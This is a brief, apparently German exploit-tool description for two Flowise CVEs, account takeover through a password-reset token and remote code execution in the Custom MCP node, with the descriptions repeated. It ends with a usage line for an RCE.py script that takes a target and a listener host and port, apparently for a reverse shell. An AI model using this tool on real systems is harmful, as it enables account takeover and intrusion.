
CVE-2025-58434 Flowise <= 3.0.5 und früher ermöglicht Kontoübernahme über unauthentifiziertes Passwort-zurücksetzen-Token. CVE-2025-59528 lowiseAI Custom MCP Node Remote-Code-Ausführung.
CVE-2025-58434 Flowise <= 3.0.5 und früher ermöglicht die Übernahme von Konten durch einen nicht authentifizierten Passwort-Reset-Token. CVE-2025-59528 flowiseAI Custom MCP Node Remotecodeausführung.
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>